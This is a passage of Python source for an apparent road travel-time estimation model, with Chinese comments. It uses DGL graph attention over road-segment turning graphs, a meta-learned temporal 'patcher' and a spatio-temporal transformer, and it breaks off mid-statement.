self._in_dst_feats, num_heads * out_dim, bias=False)\n self.res_fc_e = nn.Linear(\n self._in_dst_feats, num_heads * out_dim, bias=False)\n else:\n self.res_fc_n = Identity()\n self.res_fc_e = Identity()\n\n else:\n self.register_buffer('res_fc_n', None)\n self.register_buffer('res_fc_e', None)\n self.reset_parameters()\n self.activation = None if activation == 'none' else (\n nn.ReLU() if activation == 'relu' else nn.Sigmoid())\n\n def edge_attn_udf(self, edges):\n left = torch.bmm(\n edges.src['el'], edges.data['mask'].view(-1, self._edge_type_num, 1))\n right = torch.bmm(\n edges.dst['er'], edges.data['mask'].view(-1, self._edge_type_num, 1))\n return {'e': left+right+edges.data['em']}\n\n def edge_mean_udf(self, edges): # 使用三个求平均\n return {'ft': (edges.data['ft']+edges.src['ft']+edges.dst['ft'])/3}\n\n def forward(self, graph, feat=None):\n with graph.local_scope():\n if not self._allow_zero_in_degree:\n if (graph.in_degrees() == 0).any():\n raise DGLError('There are 0-in-degree nodes in the graph, '\n 'output for those nodes will be invalid. '\n 'This is harmful for some applications, '\n 'causing silent performance regression. '\n 'Adding self-loop on the input graph by '\n 'calling `g = dgl.add_self_loop(g)` will resolve '\n 'the issue. Setting ``allow_zero_in_degree`` '\n 'to be `True` when constructing this module will '\n 'suppress the check and let the code run.')\n if feat is None:\n n_feat = nn.Parameter(\n graph.ndata['raw_pro'], requires_grad=False)\n e_feat = nn.Parameter(\n graph.edata['raw_pro'], requires_grad=False)\n else:\n n_feat, e_feat = feat\n # _, _ = n_feat.shape\n # print(n_feat.shape, e_feat.shape)\n\n h_src = h_dst = self.feat_drop(n_feat)\n h_edge = self.feat_drop(e_feat)\n\n feat_src = feat_dst = self.fc_n(h_src).view(\n -1, self._num_heads, self._out_feats)\n\n feat_edge = self.fc_e(h_edge).view(\n -1, self._num_heads, self._out_feats)\n\n e_mask = graph.edata['mask'].view(-1, self._edge_type_num, 1)\n if self.use_static_feature:\n n_feat = graph.ndata['pro'].unsqueeze(1).repeat(\n 1, self._num_heads, 1)\n\n e_feat = graph.edata['pro'].unsqueeze(1).repeat(\n 1, self._num_heads, 1)\n\n # .unsqueeze(1).repeat(1,batch_size*self._num_heads,1)\n\n el = (torch.cat([feat_src, n_feat], dim=-1).unsqueeze(3).repeat(1, 1, 1, self._edge_type_num)\n * self.attn_l).sum(dim=-2).view(-1, self._num_heads, self._edge_type_num)\n er = (torch.cat([feat_dst, n_feat], dim=-1).unsqueeze(3).repeat(\n 1, 1, 1, self._edge_type_num)*self.attn_r).sum(dim=-2).view(-1, self._num_heads, self._edge_type_num)\n em = (torch.cat([feat_edge, e_feat], dim=-1).unsqueeze(3).repeat(1, 1, 1, self._edge_type_num) *\n self.attn_m).sum(dim=-2).view(-1, self._num_heads, self._edge_type_num)\n\n else:\n el = (feat_src.unsqueeze(3).repeat(1, 1, 1, self._edge_type_num) *\n self.attn_l).sum(dim=-2).view(-1, self._num_heads, self._edge_type_num)\n er = (feat_dst.unsqueeze(3).repeat(1, 1, 1, self._edge_type_num) *\n self.attn_r).sum(dim=-2).view(-1, self._num_heads, self._edge_type_num)\n em = (feat_edge.unsqueeze(3).repeat(1, 1, 1, self._edge_type_num) *\n self.attn_m).sum(dim=-2).view(-1, self._num_heads, self._edge_type_num)\n em = torch.bmm(em, e_mask)\n\n graph.edata.update({'em': em})\n feat_src = feat_src.view(-1, self._num_heads, self._out_feats)\n\n # graph.edata.update({'ft': feat_edge})\n\n graph.srcdata.update({'ft': feat_src, 'el': el})\n graph.dstdata.update({'er': er})\n\n # compute edge attention, el and er are a_l Wh_i and a_r Wh_j respectively.\n # graph.apply_edges(fn.u_add_e('el', 'em', 'elm'))\n # graph.apply_edges(fn.e_add_v('elm','er','e'))\n graph.apply_edges(self.edge_attn_udf)\n e = self.leaky_relu(graph.edata.pop('e'))\n # compute softmax\n graph.edata['a'] = self.attn_drop(dglnn.edge_softmax(graph, e))\n # message passing\n graph.update_all(fn.u_mul_e('ft', 'a', 'm'),\n fn.sum('m', 'ft'))\n # graph.apply_edges(self.edge_feat_udf)\n rst_n = graph.dstdata['ft']\n\n graph.edata.update({'ft': feat_edge})\n graph.apply_edges(self.edge_mean_udf)\n\n rst_e = graph.edata.pop('ft')\n\n # residual\n if self.res_fc_n is not None and self.res_fc_e is not None:\n resval_n = self.res_fc_n(h_dst).view(\n h_dst.shape[0], -1, self._out_feats)\n resval_e = self.res_fc_e(h_edge).view(\n h_edge.shape[0], -1, self._out_feats)\n rst_n = rst_n + resval_n\n rst_e = rst_e + resval_e\n\n if self._cat:\n rst_n = rst_n.view(-1, self._num_heads *\n self._out_feats) # 最后用于改变结果\n rst_e = rst_e.view(-1, self._num_heads*self._out_feats)\n else:\n rst_n = rst_n.view(-1, self._num_heads,\n self._out_feats).mean(1) # 不改维度\n rst_e = rst_e.view(-1, self._num_heads,\n self._out_feats).mean(1) # 不改变\n # activation\n if self.activation:\n rst_n = self.activation(rst_n)\n rst_e = self.activation(rst_e)\n return rst_n, rst_e\n\n def reset_parameters(self):\n \"\"\"Reinitialize learnable parameters.\"\"\"\n gain = nn.init.calculate_gain('relu')\n nn.init.xavier_normal_(self.fc_n.weight, gain=gain)\n nn.init.xavier_normal_(self.fc_e.weight, gain=gain)\n # print(self.attn_l.shape)\n nn.init.xavier_normal_(self.attn_l, gain=gain)\n nn.init.xavier_normal_(self.attn_r, gain=gain)\n nn.init.xavier_normal_(self.attn_m, gain=gain)\n if isinstance(self.res_fc_n, nn.Linear):\n nn.init.xavier_normal_(self.res_fc_n.weight, gain=gain)\n nn.init.xavier_normal_(self.res_fc_e.weight, gain=gain)\n\n\nclass GAT(nn.Module):\n def __init__(self, in_dim, num_layers,\n num_hidden,\n out_dim,\n heads,\n edge_type_num,\n activation,\n feat_drop,\n attn_drop,\n negative_slope,\n residual,\n node_feature_dim=None,\n edge_feature_dim=None,\n use_static_feature=False\n ):\n # self.edge_graph = args['edge_graph'] # type: EdgeGraph\n # 根据edge_graph\n super(GAT, self).__init__()\n # self.g = g\n self.num_layers = num_layers\n self.gat_layers = nn.ModuleList()\n self.i_gat_layers = nn.ModuleList()\n self.activation = activation\n # input projection (no residual)\n self.gat_layers.append(GATLayer(\n in_dim, num_hidden, heads[0], edge_type_num,\n feat_drop, attn_drop, negative_slope, False, self.activation, node_feature_dim=node_feature_dim,\n edge_feature_dim=edge_feature_dim, use_static_feature=use_static_feature))\n self.i_gat_layers.append(GATLayer(\n in_dim, num_hidden, heads[0], edge_type_num,\n feat_drop, attn_drop, negative_slope, False, self.activation, node_feature_dim=node_feature_dim,\n edge_feature_dim=edge_feature_dim, use_static_feature=use_static_feature))\n\n # hidden layers\n for l in range(1, num_layers):\n # due to multi-head, the in_dim = num_hidden * num_heads\n # print(l, num_layers, heads)\n self.gat_layers.append(GATLayer(\n num_hidden * heads[l-1], num_hidden, heads[l], edge_type_num,\n feat_drop, attn_drop, negative_slope, residual, self.activation, node_feature_dim=node_feature_dim,\n edge_feature_dim=edge_feature_dim, use_static_feature=use_static_feature))\n self.i_gat_layers.append(GATLayer(\n num_hidden * heads[l-1], num_hidden, heads[l], edge_type_num,\n feat_drop, attn_drop, negative_slope, residual, self.activation, node_feature_dim=node_feature_dim,\n edge_feature_dim=edge_feature_dim, use_static_feature=use_static_feature))\n # output projection\n self.gat_layers.append(GATLayer(\n num_hidden * heads[-2], out_dim, heads[-1], edge_type_num,\n feat_drop, attn_drop, negative_slope, residual, None, cat=False, node_feature_dim=node_feature_dim,\n edge_feature_dim=edge_feature_dim, use_static_feature=use_static_feature))\n self.i_gat_layers.append(GATLayer(\n num_hidden * heads[-2], out_dim, heads[-1], edge_type_num,\n feat_drop, attn_drop, negative_slope, residual, None, cat=False, node_feature_dim=node_feature_dim,\n edge_feature_dim=edge_feature_dim, use_static_feature=use_static_feature))\n\n def forward(self, g, inv_g):\n # h = inputs\n h = None\n # print(\"ok1\")\n for l in range(self.num_layers):\n h_n, h_e = self.gat_layers[l](g, h)\n ih_n, ih_e = self.i_gat_layers[l](inv_g, h)\n h = (h_n+ih_n, h_e+ih_e)\n # print(l, h[0].shape, h[1].shape)\n # output projection\n h_n, h_e = self.gat_layers[-1](g, h)\n ih_n, ih_e = self.i_gat_layers[-1](inv_g, h)\n # print(h_n.shape, h_e.shape)\n # logits = self.gat_layers[-1](g, h) + self.i_gat_layers[-1](inv_g, h)\n return (h_n+ih_n, h_e+ih_e)\n\n# class Patcher Cell 包含一个GAT+一个GRU\n# '''GAT解决对于input的修改,'''\n\n\n# transformer decoder\n\nGATParam = namedtuple('GATParam', ['in_dim', 'num_layers', 'num_hidden', 'out_dim', 'heads', 'edge_type_num', 'activation',\n 'feat_drop', 'attn_drop', 'negtive_slope', 'residual', 'node_feature_dim', 'edge_feature_dim', 'use_static_feature'])\n\nGRUParam = namedtuple('GRUParam', ['input_size', 'hidden_size',\n 'num_layers', 'bias', 'batch_first', 'dropout', 'bidirectional'])\n\nGRUCellParam = namedtuple('GRUCellParam', ['input_size', 'hidden_size'])\n\n\nclass RoadNetwork:\n def __init__(self, args):\n # 路网的空间属性信息\n self.node2edge_dict = args['node2edge_dict'] # 节点tuple转换到边id\n self.edge2node_dict = args['edge2node_dict']\n self.input_dict = args['input_dict'] # 每个节点对应到他的入度节点\n self.output_dict = args['output_dict'] # 每个节点对应到他的出度节点\n self.node_dict = args['node_dict'] # 节点的属性信息\n # {288416374: [0.6651350455486061, 0.8263341778903948, 3, 3]} (node id: [经度比率,维度比率,入度,出度])\n self.edge_dict = args['edge_dict'] # 边的属性信息\n '''{0: [0.6651350455486061,0.8263341778903948,0.6628707608956127,0.827280970796094,\n 1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0, #highway\n 0,0, #oneway\n 0,1,0,0, #lanes\n 1,0, # bridges\n 1, #junction\n 0, # tunel\n 0.020517, #length (km)\n 0.2 # maxspeed (100km/h)\n ]} '''\n # 边的id转到index(数值tensor的第一维度)\n self.edge_id2index_dict = args['edge_id2index_dict']\n # 两条边的id转到index(数值tensor的第一维度)\n self.turning_dict = args['turning_dict']\n self.edge_graph = self.buidEdgeGraph() # 五元组的表现形式(点,边,点的入度,点的出度,点对到边的映射)\n self.turning_types = ['back', 'forth', 'left', 'right']\n\n def buildDglGraph(self):\n assert self.edge_graph is not None\n source_list = []\n target_list = []\n edge_pros = []\n edge_mask = []\n for k in range(len(self.edge_graph.edges)):\n v = self.edge_graph.edges[k]\n source_list.append(v[1][0])\n target_list.append(v[1][1])\n edge_pros.append(v[2])\n edge_mask.append([0 for i in range(v[0])]+[1] +\n [0 for i in range(len(self.turning_types)-v[0]-1)])\n # edge_mintime.append(v[2][-2]/v[2][-1]*60.0)\n nodes_pro = []\n node_mintime = []\n for i in range(len(self.edge_graph.nodes)):\n v = self.edge_graph.nodes[i]\n nodes_pro.append(v)\n node_mintime.append(v[-2]/v[-1]*60.0)\n g = dgl.graph((torch.tensor(source_list), torch.tensor(\n target_list)), num_nodes=len(self.edge_dict))\n\n inv_g = dgl.graph((torch.tensor(target_list), torch.tensor(\n source_list)), num_nodes=len(self.edge_dict))\n print(type(g), type(inv_g))\n\n g.ndata['raw_pro'] = torch.FloatTensor(nodes_pro) # 赋予节点相关的属性\n inv_g.ndata['raw_pro'] = torch.FloatTensor(nodes_pro)\n\n g.edata['raw_pro'] = torch.FloatTensor(edge_pros)\n g.edata['mask'] = torch.FloatTensor(edge_mask)\n\n inv_g.edata['raw_pro'] = torch.FloatTensor(edge_pros)\n inv_g.edata['mask'] = torch.FloatTensor(edge_mask)\n # inv_g.edata['mintime'] = torch.FloatTensor(edge_mintime)\n\n g.ndata['mintime'] = torch.FloatTensor(node_mintime)\n\n return g, inv_g\n\n # 构建dgl能够识别的异构图(主要是获得异构图, 建立边的映射关系)\n def buildHeteroGraph(self):\n assert self.edge_graph is not None\n graph_keys = [(\"link\", ty, \"link\") for ty in self.turning_types]\n graph_data = {}\n edge_pro_dict = {}\n for i, key in enumerate(graph_keys):\n sources = []\n targets = []\n edge_pros = []\n for k in range(len(self.edge_graph.edges)):\n v = self.edge_graph.edges[k]\n if v[0] == i:\n sources.append(v[1][0])\n targets.append(v[1][1])\n edge_pros.append(v[2])\n graph_data[key] = (torch.tensor(sources), torch.tensor(targets))\n edge_pro_dict[self.turning_types[i]] = edge_pros\n\n g = dgl.heterograph(graph_data)\n\n # 构建逆向的图\n inverse_graph_data = {}\n for k, v in graph_data.items():\n inverse_graph_data[k] = (v[1], v[0])\n\n inv_g = dgl.heterograph(inverse_graph_data)\n\n # 获取节点的属性\n nodes_pro = []\n for i in range(len(self.edge_graph.nodes)):\n nodes_pro.append(self.edge_graph.nodes[i])\n g.ndata['pro'] = torch.FloatTensor(nodes_pro) # 赋予节点相关的属性\n inv_g.ndata['pro'] = torch.FloatTensor(nodes_pro)\n\n for k, v in edge_pro_dict.items():\n g.edges[k].data['pro'] = torch.FloatTensor(v)\n inv_g.edges[k].data['pro'] = torch.FloatTensor(v)\n\n return g, inv_g\n\n # 构建一个edge作为节点,edge之间的连接作为边的图(边的类型需要)\n\n def buidEdgeGraph(self):\n nodes = {} # 所有边的id对应到属性\n for k, v in self.edge_dict.items():\n nodes[self.edge_id2index_dict[k]] = v\n edges = {} # 所有turning的id及其对应到的属性\n out_dict = {} # 节点间的拓扑结构\n in_dict = {}\n node2edge_dict = {}\n for k, v in self.turning_dict.items():\n e1, e2 = k\n n1 = self.edge2node_dict[e1][1]\n n2 = self.edge2node_dict[e2][0]\n assert n1 == n2\n e1_pro = self.edge_dict[e1]\n e2_pro = self.edge_dict[e2]\n n_pro = self.node_dict[n1]\n # 计算两条表的cos角度,然后\n vector1 = np.array([e1_pro[2]-e1_pro[0], e1_pro[3]-e1_pro[1]])\n vector2 = np.array([e2_pro[2]-e2_pro[0], e2_pro[3]-e2_pro[1]])\n cos_sim = np.dot(vector1, vector2) / \\\n (np.linalg.norm(vector1)*(np.linalg.norm(vector2)))\n #\n if cos_sim <= -1+1e-3: # 掉头\n type_turning = 0\n elif cos_sim >= np.cos(np.pi*1/4): # 转弯幅度少于45度,判断为直行\n type_turning = 1\n else: # 左转或者右转(将第一条路段映射到横坐标的正值,然后第二条路的最后一个点的y值如果大于0就是左转,否则为右转)\n cos1 = vector1[0]/np.linalg.norm(vector1)\n sin1 = vector1[1]/np.linalg.norm(vector1)\n # vector2_ = [e2_pro[2]-e1_pro[0], e2_pro[3]-e1_pro[1]] #计算第三个点\n # vector2_ = np.array([cos1*vector2_[0]+sin1*vector2_[1],-sin1*vector2_[0] +cos1*vector2_[1]]) #第三个点在在给定的第一个点的条件下,知道是左转还是右转\n if (e2_pro[2]-e1_pro[0])*(-sin1) + (e2_pro[3]-e1_pro[1])*cos1 >= 0: # 右转\n type_turning = 2\n else: # 左转\n type_turning = 3\n edges[v] = (type_turning, (self.edge_id2index_dict[e1],\n self.edge_id2index_dict[e2]), e1_pro+e2_pro+n_pro)\n # 节点出度统计\n out_dict[self.edge_id2index_dict[e1]] = out_dict.get(\n self.edge_id2index_dict[e1], []) + [self.edge_id2index_dict[e2]]\n # 节点入度统计\n in_dict[self.edge_id2index_dict[e2]] = in_dict.get(\n self.edge_id2index_dict[e2], [])+[self.edge_id2index_dict[e1]]\n # 节点tuple对应的边统计\n node2edge_dict[(self.edge_id2index_dict[e1],\n self.edge_id2index_dict[e2])] = v\n return EdgeGraph._make([nodes, edges, in_dict, out_dict, node2edge_dict])\n\n\nclass Predictor(nn.Module):\n def __init__(self, in_feat, out_feat, activation):\n self.predictor = nn.Linear(in_feat, out_feat)\n self.activation = activation\n\n def forward(self, x):\n return self.activation(self.predictor(x))\n\n\nclass ArGenerator(nn.Module):\n def __init__(self, generator, n_grucell, e_grucell, hidden_dim):\n self.generator = generator\n self.n_grucell = n_grucell\n self.e_grucell = e_grucell\n self.n_predictor = Predictor(hidden_dim, 1, nn.Sigmoid)\n self.e_predictor = Predictor(hidden_dim, 1, nn.ReLU)\n self.n_predictor_sigma2 = Predictor(hidden_dim, 1, nn.ReLU)\n self.e_predictor_sigma2 = Predictor(hidden_dim, 1, nn.ReLU)\n\n def forward(self, g, in_feat, hid_feat):\n x_n, x_e = self.generator(g, in_feat)\n _, batch_size, feat_dim = x_n.shape\n _, _, hid_dim = hid_feat\n h_n = self.n_grucell(\n x_n.view(-1, feat_dim), hid_feat.view(-1, hid_dim)).view(-1, batch_size, hid_dim)\n h_e = self.e_grucell(\n x_e.view(-1, feat_dim), hid_feat.view(-1, hid_dim)).view(-1, batch_size, hid_dim)\n\n return h_n, self.n_predictor(h_n), h_e, self.e_predictor(h_e)\n\n\nclass TestModel(nn.Module):\n def __init__(self):\n super(TestModel, self).__init__()\n self.lr = nn.Linear(10, 1)\n\n def forward(self, x):\n return self.lr(x)\n\n\nclass LeimPatcher(nn.Module):\n def __init__(self, args):\n super(LeimPatcher, self).__init__()\n # out_dim = args['out_dim']\n\n # 时间信息\n self.slot_size = args['slot_size']\n self.time_embedding_dim = args['time_embedding_size']\n self.day_embedding_dim = args['day_embedding_size']\n self.device = args['device']\n\n self.day_in_week_embedding = nn.Embedding(7, self.day_embedding_dim)\n self.time_in_day_embedding = nn.Embedding(\n int(24*60/self.slot_size), self.time_embedding_dim)\n self.g, self.inv_g = args['g'], args['inv_g']\n if args['road_network'] is not None:\n self.node_pro_dim = len(\n args['road_network'].node_dict[0]) # 原始node\n self.edge_pro_dim = len(\n args['road_network'].edge_dict[0]) # 原始edge\n self.node_size = len(args['road_network'].edge_graph.nodes)\n self.edge_size = len(args['road_network'].edge_graph.edges)\n else:\n self.node_pro_dim = self.edge_pro_dim = self.node_size = self.edge_size = 10\n\n # 公用的参数\n dropout = args['dropout']\n # 路段、转化点的隐向量维度\n edge_hidden_size = args['edge_hidden_size']\n turning_hidden_size = args['turning_hidden_size']\n # patcher_gat_param = args['patcher_gat_param']\n # patcher_gat_param['edge_type_num'] = len(self.graph.turning_types)\n args['patcher_gat_param']['in_dim'] = (\n self.edge_pro_dim, 2*self.edge_pro_dim+self.node_pro_dim)\n self.patcher_gat_param = GATParam(**args['patcher_gat_param'])\n print(self.patcher_gat_param)\n\n # 道路属性的编码(meta-learner)\n self.edge_weight_nn = nn.Sequential(\n nn.Linear(self.edge_pro_dim, edge_hidden_size),\n nn.ReLU(),\n nn.Dropout(dropout),\n nn.Linear(edge_hidden_size,\n self.patcher_gat_param.node_feature_dim),\n # nn.Sigmoid()\n )\n # 道路交叉点使用两条边加中间节点的属性信息(meta-learner)\n self.turning_weight_nn = nn.Sequential(\n nn.Linear(\n 2*self.edge_pro_dim+self.node_pro_dim, turning_hidden_size),\n nn.ReLU(),\n nn.Dropout(dropout),\n nn.Linear(turning_hidden_size,\n self.patcher_gat_param.edge_feature_dim),\n # nn.Sigmoid()\n )\n\n # 构建patcher\n self.patcher_gat = GAT(*tuple(self.patcher_gat_param))\n # self.generator_gat_param = args['generator_gat_param']\n # self.generator_gat = GAT(*tuple(self.generater_gat_param))\n\n # # 构建encoder中的GRU\n # self.grucell_param = GRUCellParam(**args['patcher_grucell_param'])\n # self.grucell = nn.GRUCell(*tuple(self.grucell_param))\n # # 构建meta gru (从node和edge feat修饰 输入和hidden)\n # self.nodefeat2input = nn.Parameter(torch.zeros(\n # size=(self.patcher_gat_param.node_feature_dim, self.grucell_param.input_size * self.patcher_gat_param.out_dim)))\n # nn.init.xavier_uniform_(self.nodefeat2input.data, gain=1.414)\n # self.edgefeat2input = nn.Parameter(torch.zeros(\n # size=(self.patcher_gat_param.edge_feature_dim, self.grucell_param.input_size * self.patcher_gat_param.out_dim)))\n # nn.init.xavier_uniform_(self.edgefeat2input.data, gain=1.414)\n # self.nodefeat2hidden = nn.Parameter(torch.zeros(\n # size=(self.patcher_gat_param.node_feature_dim, self.grucell_param.hidden_size * self.grucell_param.hidden_size)))\n # nn.init.xavier_uniform_(self.nodefeat2input.data, gain=1.414)\n # self.edgefeat2hidden = nn.Parameter(torch.zeros(\n # size=(self.patcher_gat_param.edge_feature_dim, self.grucell_param.hidden_size * self.grucell_param.hidden_size)))\n # nn.init.xavier_uniform_(self.edgefeat2hidden.data, gain=1.414)\n\n # assert self.gru_param.input_size == self.patcher_gat_param.out_dim\n\n # 周期性质和节点特征做矩阵乘法得到基准预测结果\n self.base_n_mu = nn.Parameter(torch.zeros(\n size=(self.patcher_gat_param.out_dim, self.day_embedding_dim+self.time_embedding_dim)))\n nn.init.xavier_uniform_(self.base_n_mu.data, gain=1.414)\n self.base_n_sigma = nn.Parameter(torch.zeros(\n size=(self.patcher_gat_param.out_dim, self.day_embedding_dim+self.time_embedding_dim)))\n nn.init.xavier_uniform_(self.base_n_sigma.data, gain=1.414)\n # Predictor(self.day_embedding_dim+self.time_embedding_dim,1,nn.Sigmoid)\n self.base_e_mu = nn.Parameter(torch.zeros(\n size=(self.patcher_gat_param.out_dim, self.day_embedding_dim+self.time_embedding_dim)))\n nn.init.xavier_uniform_(self.base_e_mu.data, gain=1.414)\n self.base_e_sigma = nn.Parameter(torch.zeros(\n size=(self.patcher_gat_param.out_dim, self.day_embedding_dim+self.time_embedding_dim)))\n nn.init.xavier_uniform_(self.base_e_sigma.data, gain=1.414)\n\n # self.g = self.g.to(self.device)\n # self.inv_g = self.inv_g.to(self.device)\n\n def to(self, device):\n super().to(device)\n self.g, self.inv_g = self.g.to(\n device), self.inv_g.to(device)\n\n def forward(self, x):\n # is_train: 如果是训练的话,那么y是和x具有一样的表示,都是稀疏的分布表示\n '''input: encoder_x: (day: Tensor([batch_size]), time: Tensor([batch_size)'''\n '''output: node_out: Tensor([batch_size, node_size, out_dim]), edge_out: Tensor([batch_size, edge_size, out_dim])'''\n\n day, time = x\n # print(type(self.g))\n\n batch_size = len(day)\n\n temporal_emb = torch.cat([self.day_in_week_embedding(\n day), self.time_in_day_embedding(time)], dim=-1) # [batch_size, day_dim+time+dim]\n\n # 调用patcher获得补全\n # node_h, edge_h = self.patcher_gat(self.g, self.inv_g, (node_feat.view(batch_size*time_steps, node_size, -1).transpose(\n # 1, 0), edge_feat.view(batch_size*time_steps, edge_size, -1).transpose(1, 0)))\n\n # node_h = node_h.transponse(1, 0).contiguous().view(\n # batch_size, node_size, time_steps, -1)\n # edge_h = edge_h.transpose(1, 0).contiguous().view(\n # batch_size, edge_size, time_steps, -1)\n # 编码得到dgl图点边的属性\n self.g.ndata['pro'] = self.edge_weight_nn(self.g.ndata['raw_pro'])\n self.inv_g.ndata['pro'] = self.edge_weight_nn(\n self.inv_g.ndata['raw_pro'])\n self.g.edata['pro'] = self.turning_weight_nn(self.g.edata['raw_pro'])\n self.inv_g.edata['pro'] = self.turning_weight_nn(\n self.inv_g.edata['raw_pro'])\n\n node_h, edge_h = self.patcher_gat(self.g, self.inv_g)\n # 过一下GRU\n # node_h, edge_h = self.gruprocess(self.g, (node_h, edge_h), None)\n\n # 基准\n n_mu = torch.bmm(\n torch.matmul(node_h, self.base_n_mu).unsqueeze(0).repeat(batch_size, 1, 1), temporal_emb.view(batch_size, -1, 1)).view(batch_size, self.node_size)\n\n # n_mu = self.g.ndata['mintime'].unsqueeze(\n # 0).repeat(batch_size, 1)/n_mu # 考虑到最大的\n\n n_sigma2 = torch.bmm(\n torch.matmul(node_h, self.base_n_sigma).unsqueeze(0).repeat(batch_size, 1, 1), temporal_emb.view(batch_size, -1, 1)).view(batch_size, self.node_size)\n\n e_mu = torch.bmm(\n torch.matmul(edge_h, self.base_e_mu).unsqueeze(0).repeat(batch_size, 1, 1), temporal_emb.view(batch_size, -1, 1)).view(batch_size, self.edge_size)\n\n e_sigma2 = torch.bmm(\n torch.matmul(edge_h, self.base_e_sigma).unsqueeze(0).repeat(batch_size, 1, 1), temporal_emb.view(batch_size, -1, 1)).view(batch_size, self.edge_size)\n # print(n_mu[:, :100], n_sigma[:, :100], e_mu[:, :100], e_sigma[:, :100])\n # print(n_mu.shape)\n return n_mu, n_sigma2**2, e_mu, e_sigma2**2\n\n# def gruprocess(self, g, x, hid):\n # # x: ([node_size, batch_size, time_steps, -1], [edge_size, batch_size, time_steps, -1]), hid: None\n # node_pro = g.ndata['pro']\n # edge_pro = g.edata['pro']\n # x_node, x_edge = x\n # batch_size, node_size, time_steps, _ = x_node\n # _, edge_size, _, _ = x_edge\n # if hid is None:\n # hid_node = torch.zeros(\n # size=(batch_size*node_size, self.grucell_param.hidden_size))\n # hid_edge = torch.zeros(\n # size=(batch_size*edge_size, self.grucell_param.hidden_size))\n # node_output = []\n # edge_output = []\n # for i in range(time_steps):\n # hid_node = self.grucell(torch.bmm(torch.matmul(node_pro, self.nodefeat2input).view(node_size, self.grucell_param.input_size, -1).repeat(batch_size, 1, 1), x_node[:, :, i, :].view(-1, self.patcher_gat_param.out_dim, 1)).view(-1, self.grucell_param.input_size), torch.bmm(\n # torch.matmul(node_pro, self.nodefeat2hidden).view(node_size, self.grucell_param.hidden_size, -1).repeat(batch_size, 1, 1), hid_node.view(-1, self.grucell_param.hidden_size, 1)).view(-1, self.grucell_param.hidden_size))\n\n # hid_edge = self.grucell(torch.bmm(torch.matmul(edge_pro, self.edgefeat2input).view(edge_size, self.grucell_param.input_size, -1).repeat(batch_size, 1, 1), x_edge[:, :, i, :].view(-1, self.patcher_gat_param.out_dim, 1)).view(-1, self.grucell_param.input_size), torch.bmm(\n # torch.matmul(edge_pro, self.edgefeat2hidden).view(edge_size, self.grucell_param.hidden_size, -1).repeat(batch_size, 1, 1), hid_edge.view(-1, self.grucell_param.hidden_size, 1)).view(-1, self.grucell_param.hidden_size))\n\n # node_output.append(hid_node)\n # edge_output.append(hid_edge)\n\n # return torch.stack(node_output, dim=1).view(batch_size, node_size, time_steps, -1), torch.stack(edge_output, dim=1).view(batch_size, edge_size, time_steps, -1)\n\n\n'''实现一个时空融合的transformer编码和解码器得到每条路段以及每个交叉口的通勤时间'''\n\nSTParam = namedtuple('STParam', ['embedding_size_1', 'lens', 'embedding_size_2', 'hidden_size', 'num_layers', 'num_heads', 'total_key_depth', 'total_value_depth',\n 'filter_size', 'max_length', 'input_dropout', 'layer_dropout',\n 'attention_dropout', 'relu_dropout', 'use_mask', 'act', 'kernel_size', 'wide', 'height'])\n\n# class STTransformer(nn.Module):\n# def __init__(self, args):\n\n\nclass STTransformer(nn.Module):\n \"\"\"\n A Transformer Module For BabI data. \n Inputs should be in the shape story: [batch_size, memory_size, story_len ]\n query: [batch_size, 1, story_len]\n Outputs will have the shape [batch_size, ]\n \"\"\"\n\n def __init__(self, embedding_size_1, lens, embedding_size_2, hidden_size, num_layers, num_heads, total_key_depth, total_value_depth,\n filter_size, max_length, input_dropout, layer_dropout,\n attention_dropout, relu_dropout, use_mask, act, kernel_size, wide, height):\n super(STTransformer, self).__init__()\n # self.encoder_input_size = embedding_size #\n self.transformer_enc = Encoder(embedding_size_1, hidden_size, num_layers, num_heads, total_key_depth, total_value_depth,\n filter_size, lens, input_dropout, layer_dropout,\n attention_dropout, relu_dropout, act, kernel_size, wide, height)\n\n self.transformer_dec = Decoder(embedding_size_2, hidden_size, num_layers, num_heads, total_key_depth, total_key_depth, filter_size,\n max_length, input_dropout, layer_dropout, attention_dropout, relu_dropout, act, kernel_size, wide, height, use_mask)\n\n self.generator = nn.Sequential(\n nn.Linear(hidden_size, hidden_size),\n nn.Rel(),\n nn.Linear(hidden_size, 2)\n )\n\n def forward(self, x_enc, x_dec, src_mask, n_mu, n_sigma2, e_mu, e_sigma2, n_min_time):\n # x_enc: [batch_size, enc_seq_length, w, h, 2]\n # x_dec: [batch_size, dec_seq_length, node_edge_embedding]\n # src_mask: [batch_size, dec_seq_length]\n # n_sigma2, n_mu, n_min_time: [batch_size, dec_node_length]\n # e_mu, e_sigma2: [batch_size, dec_edge_length]\n\n encoder_output = self.transformer_enc(x_enc)\n decoder_output = self.transformer_dec(x_dec, encoder_output, src_mask)\n src_node_mask = src_mask[:, ::2]\n src_edge_mask = src_mask[:, 1::2]\n decoder_node = (n_min_time /\n torch.sigmoid(decoder_output[:, :, 0][:, ::2]*n_sigma2+n_mu)).masked_fill(src_node_mask == 0, 0)\n\n decoder_edge = torch.relu(\n decoder_output[:, :, 1][:, 1::2]*e_sigma2+e_mu).masked_fill(src_edge_mask == 0, 0)\n\n return decoder_node, src_node_mask, decoder_edge, src_edge_mask\n\n\nclass Leim(nn.Module):\n def __init__(self, args):\n # self._pather = LeimPatcher(args) # 获得所有的link对应的时间信息,然后需要根据具体的link表示抽取出特定的\n self._pather = LeimPatcher(args)\n\n stParam = STParam(**args['stparam'])\n self._transformer = STTransformer(*tuple(stParam))\n\n # 将edge和node映射到同一维度上去\n # 道路属性的编码(meta-learner)\n self.node_emb = nn.Linear(\n args['g'].ndata['raw_pro'].shape[-1], stParam.embedding_size_2),\n # 道路交叉点使用两条边加中间节点的属性信息(meta-learner)\n self.edge_emb = nn.Linear(\n args['g'].edata['raw_pro'].shape[-1], stParam.embedding_size_2)\n\n self.mintime = nn.Parameter(\n args['g'].edata['mintime'], requires_grad=False)\n\n def forward(self, d_t, x_idx, x, src_mask):\n # x_enc: [batch_size, enc_seq_length, w, h, 2]\n # node_dec: [batch_size, dec_node_length, raw_node_pro_dim]\n # edge_dec: [batch_size, dec_edge_length, raw_edge_pro_dim]\n # node_mask: [bath_size, dec_node_length]\n # edge_mask: [batch_size, dec_edge_length]\n n_mu, n_sigma2, e_mu, e_sigma2 = self._pather(d_t)\n\n x_enc, node_dec, edge_dec = x\n bs, node_len, _ = node_dec.shape\n _, edge_len, _ = edge_dec.shape\n node_dec = self.node_emb(node_dec)\n edge_dec = self.edge_emb(edge_dec)\n x_dec = torch.cat([node_dec, edge_dec], dim=1).permute(\n 1, 0, 2).contiguous().view(node_len+edge_len, -1)\n idx = 